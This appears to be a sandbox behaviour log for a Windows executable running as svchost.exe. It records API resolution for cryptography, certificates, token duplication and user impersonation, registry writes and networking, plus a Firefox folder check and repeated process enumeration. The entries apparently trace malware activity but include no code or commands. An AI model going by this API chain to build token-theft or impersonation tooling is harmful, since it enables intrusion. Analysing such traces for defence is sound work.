Module	Load	module_name = ADVAPI32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x774cdf66	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x774cdf7e	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGenKey, address_out = 0x774c8ee9	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x774ce124	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x774d1562	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryInfoKeyA, address_out = 0x774ce143	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x774cdf4e	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x774c91dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGenRandom, address_out = 0x774cdfc8	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextW, address_out = 0x774cdf14	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGetUserKey, address_out = 0x77503228	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyKey, address_out = 0x774cc51a	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x774cca94	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyExA, address_out = 0x774d1481	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x774d4907	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExA, address_out = 0x774d14b3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyExA, address_out = 0x774d1469	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x774d48ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x774d431c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x774d4344	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = DuplicateToken, address_out = 0x774cc7e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x774d4304	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x774cc57a	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x774ea4b4	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegDisablePredefinedCacheEx, address_out = 0x77503429	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyA, address_out = 0x774ccd01	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x774cca24	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CreateProcessAsUserA, address_out = 0x77502538	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x774cdf36	1	Fn
Module	Load	module_name = WTSAPI32.dll, base_address = 0x73f10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSQueryUserToken, address_out = 0x73f11f81	1	Fn
Module	Load	module_name = USERENV.dll, base_address = 0x74b30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x74b31a7a	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 3, address_out = 0x75a93918	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 2, address_out = 0x75a94582	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 1, address_out = 0x75a968b6	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 13, address_out = 0x75a9b001	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 23, address_out = 0x75a93eb8	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 4, address_out = 0x75a96bdd	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 16, address_out = 0x75a96b0e	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 8, address_out = 0x75a92d57	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 21, address_out = 0x75a941b6	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 115, address_out = 0x75a93ab2	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 52, address_out = 0x75aa7673	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 22, address_out = 0x75a9449d	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 111, address_out = 0x75a937ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 19, address_out = 0x75a96f01	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 9, address_out = 0x75a92d8b	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x771d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrCmpNA, address_out = 0x771fc57c	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrCmpNIA, address_out = 0x771dd11c	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = wnsprintfA, address_out = 0x771fedae	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x771dd250	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrStrIW, address_out = 0x771e46e9	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrStrA, address_out = 0x771fc45b	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memchr, address_out = 0x77364c00	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = _wcsicmp, address_out = 0x77386f61	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcpy, address_out = 0x77364cc0	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strrchr, address_out = 0x77365900	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcmp, address_out = 0x77363b1b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x77377690	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memset, address_out = 0x77365340	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strstr, address_out = 0x773775c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strncpy, address_out = 0x77365790	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strncat, address_out = 0x77365650	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strncmp, address_out = 0x773a25ec	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memmove, address_out = 0x77365000	1	Fn
Module	Load	module_name = CRYPT32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptExportPublicKeyInfo, address_out = 0x7564455f	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertNameToStrA, address_out = 0x7566b2df	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertCreateSelfSignCertificate, address_out = 0x75667a93	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertFreeCertificateContext, address_out = 0x7561f5b5	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptSignAndEncodeCertificate, address_out = 0x756674a1	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertCloseStore, address_out = 0x7561dd10	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertStrToNameA, address_out = 0x7566b33a	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptEncodeObject, address_out = 0x75624ba9	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertSetCertificateContextProperty, address_out = 0x7562bb05	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertFindCertificateInStore, address_out = 0x756225e8	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertOpenStore, address_out = 0x7561df23	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertGetCertificateContextProperty, address_out = 0x75620bda	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertFindExtension, address_out = 0x75622595	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertCreateCertificateContext, address_out = 0x75620b37	1	Fn
Module	Load	module_name = Secur32.dll, base_address = 0x75390000	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = ApplyControlToken, address_out = 0x753c47de	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = QueryContextAttributesA, address_out = 0x753ba43b	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = EncryptMessage, address_out = 0x753b52e4	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = AcceptSecurityContext, address_out = 0x753b7b49	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = AcquireCredentialsHandleA, address_out = 0x753ba11a	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = DeleteSecurityContext, address_out = 0x753b3323	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = InitializeSecurityContextA, address_out = 0x753c4c32	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = DecryptMessage, address_out = 0x753b53b2	1	Fn
Module	Get Address	module_name = c:\windows\system32\secur32.dll, function = FreeContextBuffer, address_out = 0x753b2daf	1	Fn
Module	Load	module_name = SHELL32.dll, base_address = 0x75bb0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x75dffb26	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:17 (UTC)	1	Fn
System	Get Time	type = Performance Ctr, time = 26213509034	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Load	module_name = api-ms-win-core-sysinfo-l1-2-1, base_address = 0x0	2	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:17 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11035619	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x0	1	Fn
Module	Get Address	function = EnterCriticalSection, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = LeaveCriticalSection, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = InitializeCriticalSection, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = CloseHandle, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = DeleteCriticalSection, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = SetEvent, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = ResetEvent, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = WaitForSingleObjectEx, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = CreateEventW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetModuleHandleW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = IsDebuggerPresent, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetStartupInfoW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = IsProcessorFeaturePresent, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = QueryPerformanceCounter, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetCurrentProcessId, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetCurrentThreadId, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = InitializeSListHead, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetCurrentProcess, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = TerminateProcess, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = WideCharToMultiByte, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = EncodePointer, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = DecodePointer, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = MultiByteToWideChar, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = SetLastError, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = InitializeCriticalSectionAndSpinCount, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = TlsAlloc, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = TlsGetValue, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = TlsSetValue, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = TlsFree, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = LCMapStringW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetLocaleInfoW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetStringTypeW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetCPInfo, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetLastError, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = FreeLibrary, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = LoadLibraryExW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = RaiseException, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = InterlockedFlushSList, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = RtlUnwind, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = ExitProcess, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetModuleHandleExW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetModuleFileNameA, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = HeapAlloc, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = HeapReAlloc, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = HeapFree, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetACP, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetStdHandle, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetFileType, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = IsValidLocale, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetUserDefaultLCID, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = EnumSystemLocalesW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = FindClose, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = FindFirstFileExA, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = FindNextFileA, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = IsValidCodePage, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetOEMCP, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetCommandLineA, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetCommandLineW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetEnvironmentStringsW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = FreeEnvironmentStringsW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetProcessHeap, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = FlushFileBuffers, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = WriteFile, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetConsoleCP, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = GetConsoleMode, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = ReadFile, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = SetFilePointerEx, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = SetStdHandle, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = HeapSize, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = WriteConsoleW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = ReadConsoleW, ordinal = 0, address_out = 0x1df87c	1	Fn
Module	Get Address	function = CreateFileW, ordinal = 0, address_out = 0x1df87c	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:17 (UTC)	1	Fn
System	Get Time	type = Performance Ctr, time = 26221877920	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76b418be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x773545a5	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x76b61f61	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76b63879	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x76b59601	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x76b124d8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76b4db8b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76b42111	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76b4b009	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x773589be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7734c02a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7734c0d2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76b43f78	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77358bfb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7734b567	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77375998	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77342251	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x773428f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76b99aa9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount64, address_out = 0x76b4eb4e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x76b538ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x76b48d0f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeConditionVariable, address_out = 0x773d5a7b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x773545a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76b418be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x7738334e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77361801	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77383324	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x76b423f5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x76b489f2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x773426a9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x77342111	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x76b6ebc6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76b453a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Get Info	filename = C:\Program Files\Mozilla Firefox, type = file_attributes	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
